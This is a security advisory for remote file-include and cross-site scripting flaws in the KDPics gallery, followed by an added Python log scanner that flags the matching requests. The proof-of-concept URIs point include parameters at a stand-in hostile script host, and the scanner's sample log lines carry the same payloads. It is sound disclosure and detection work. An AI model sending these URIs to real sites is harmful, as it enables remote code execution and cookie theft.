KDPics Multiple Input Validation Vulnerabilities
BID:21515
Info
| Bugtraq ID: | 21515 |
| Class: | Input Validation Error |
| CVE: | CVE-2006-6516 CVE-2006-6517 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 09 2006 12:00AM |
| Updated: | Aug 09 2010 04:15PM |
| Credit: | Mr_KaLiMaN is credited with the discovery of these vulnerabilities. |
| Vulnerable: | KDPics KDPics 1.16; KDPics KDPics 1.11 |
| Not Vulnerable: | |
Discussion
KDPics is prone to multiple input-validation vulnerabilities, including cross-site scripting and remote file-include issues, because the application fails to sanitize user-supplied input.
A successful exploit may allow unauthorized users to view files, to execute arbitrary scripts within the context of the browser, and to steal cookie-based authentication credentials. Other attacks are also possible.
KDPics 1.16 and prior versions are vulnerable.
Exploit / POC
Attackers can exploit these issues via a web client.
The following proof-of-concept URIs are available:
Remote file-include vulnerability:
http://www.example.com/[kdpics_path]/index.php3?page=http://evil_script.txt?
http://www.example.com/[kdpics_path]/authenticate.inc.php3?lib_path=http://evil_script.txt?
http://www.example.com/[kdpics_path]/lib/exifer/exif.php?lib_path=http://evil_script.txt?
Cross-site scripting vulnerability:
http://www.example.com/[kdpics_path]/index.php3?page=galeries&categories=[XSS]
http://www.example.com/[kdpics_path]/galeries.inc.php3?categories=[XSS]
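Defenders can look for the request shapes listed above in web server access logs. The following detector is an added example, not part of the original advisory or of KDPics; the function names, the heuristics and the log lines (Apache combined format, documentation addresses) are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> parameters, taken from the proof-of-concept URIs in this advisory.
RFI_PARAMS = {
    "index.php3": {"page"},
    "authenticate.inc.php3": {"lib_path"},
    "exif.php": {"lib_path"},
}
XSS_PARAMS = {
    "index.php3": {"categories"},
    "galeries.inc.php3": {"categories"},
}
# Heuristics (assumptions): an include parameter should never hold a URL,
# and a category name should never hold markup characters.
URL_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.I)
MARKUP = re.compile(r'[<>"]')
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return sorted findings ("rfi:<param>" / "xss:<param>") for one log line."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    parts = urlsplit(m.group(1))
    script = parts.path.rsplit("/", 1)[-1].lower()
    findings = set()
    # parse_qsl percent-decodes values, so encoded requests are matched too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in RFI_PARAMS.get(script, ()) and URL_VALUE.match(value):
            findings.add("rfi:" + name)
        if name in XSS_PARAMS.get(script, ()) and MARKUP.search(value):
            findings.add("xss:" + name)
    return sorted(findings)

def scan(lines):
    """Return (line_number, findings) for every line with at least one finding."""
    return [(i, f) for i, line in enumerate(lines, 1) if (f := classify(line))]

SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '192.0.2.10 - - [09/Dec/2006:10:00:01 +0000] "GET /kdpics/index.php3?page=galeries&categories=holidays HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.44 - - [09/Dec/2006:10:02:13 +0000] "GET /kdpics/index.php3?page=http://host.invalid/x.txt? HTTP/1.1" 200 312 "-" "-"',
    '192.0.2.44 - - [09/Dec/2006:10:02:15 +0000] "GET /kdpics/lib/exifer/exif.php?lib_path=http%3A%2F%2Fhost.invalid%2Fx.txt HTTP/1.1" 200 0 "-" "-"',
    '192.0.2.51 - - [09/Dec/2006:10:05:40 +0000] "GET /kdpics/galeries.inc.php3?categories=%3Cb%3Etest%3C%2Fb%3E HTTP/1.1" 200 977 "-" "-"',
]
```

A hit only shows that a request matched the advisory's pattern; whether it succeeded depends on the installed KDPics version and the PHP configuration of the host.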
Solution / Fix
Solution:
The vendor has released an update to address this issue. Please see the references for more information.
References
References:
- KDPics Homepage (KDPics)
- KDPics Release Notes (KDPics)
- KDPics Multiple Vulnerabities (Mr_KaLiMaN)